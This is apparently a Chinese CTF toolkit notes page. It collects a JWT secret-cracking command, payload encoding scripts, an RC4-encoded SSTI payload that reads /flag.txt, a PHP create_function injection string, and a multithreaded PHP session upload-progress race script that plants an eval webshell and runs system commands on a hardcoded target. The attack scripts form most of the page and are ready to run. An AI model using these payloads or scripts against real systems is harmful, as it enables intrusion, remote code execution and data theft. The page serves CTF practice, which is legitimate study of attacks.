工具
在线工具
离线工具
其他
jwt爆破工具c-jwt-cracker
下载后,先安装libssl-dev
apt install libssl-dev然后再在c-jwt-cracker目录下make一下,最后直接执行
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSJ9.Xjc37g2j_pU5SFHYwoPSHWJDEmRVPtfHkbFfGPcn4W0
字符串转十六进制、八进制、Unicode脚本
# -*- coding:utf-8 -*-
def hex_payload(payload):
res_payload = ''
for i in payload:
i = "\\x" + hex(ord(i))[2:]
res_payload += i
print("[+]'{}' Convert to hex: \"{}\"".format(payload,res_payload))
def oct_payload(payload):
res_payload = ""
for i in payload:
i = "\\" + oct(ord(i))[2:]
res_payload += i
print("[+]'{}' Convert to oct: \"{}\"".format(payload,res_payload))
def uni_payload(payload):
res_payload = ""
for i in payload:
i = "\\u{{{0}}}".format(hex(ord(i))[2:])
res_payload += i
print("[+]'{}' Convert to unicode: \"{}\"".format(payload,res_payload))
if __name__ == '__main__':
payload = 'phpinfo'
hex_payload(payload)
oct_payload(payload)
uni_payload(payload)
rc4编码rc4_main(秘钥,原文)
import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
# print("RC4加密主函数")
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
# print("原来的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混乱后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt(plain, box):
# print("调用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
cipher = "".join(res)
print("加密后的字符串是:%s" %quote(cipher))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
url编码
import urllib.parse
import binascii
test = "debu=aqua_is_cute&file=data:,debu_debu_aqua&shana[]=1&passwd[]=2&flag[code]=create_function&flag[arg]=}var_dump(get_defined_vars());//"
print(test)
alist = []
test = urllib.parse.quote(binascii.b2a_hex(test.encode('utf-8')))
for i in range(0, len(test), 2):
alist.append(test[i:i+2])
print('%' + '%'.join(alist).replace("%3d", "=").replace("%26", "&"))
文字取反获取字母字典
_码[1]
a果[1]
b来[1]
c在[1]
d国[1]
e的[1]
f白[1]
g是[1]
h时[1]
i於[1]
j数[1]
k用[1]
l铁[1]
m和[1]
n著[1]
o同[1]
p可[1]
q现[1]
r十[1]
s化
t拉
u花
v特
w利
x出
y军
z光
A得
B作
C会
D他
E了
F年
G一
H工
I消
J走
K质
L法
M没
N求
O水
P对
Q定
R子
S次
T高
U验
V究
W言
X种
Y要
Z好
session竞争脚本
import io
import requests
import threading # 多线程
from cffi.backend_ctypes import xrange
sessid = '0'
target = 'http://1.14.71.254:28231'
file = 'ph0ebus.txt'
f = io.BytesIO(b'a' * 1024 * 50)
def write(session):
while True:
session.post(target, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'},
files={'file': (file, f)}, cookies={'PHPSESSID': sessid})
def read(session):
while True:
resp = session.post(
f"{target}?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');")
if file in resp.text:
print(resp.text)
event.clear()
else:
print("[+]retry")
if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in xrange(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in xrange(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()
浙公网安备 33010602011771号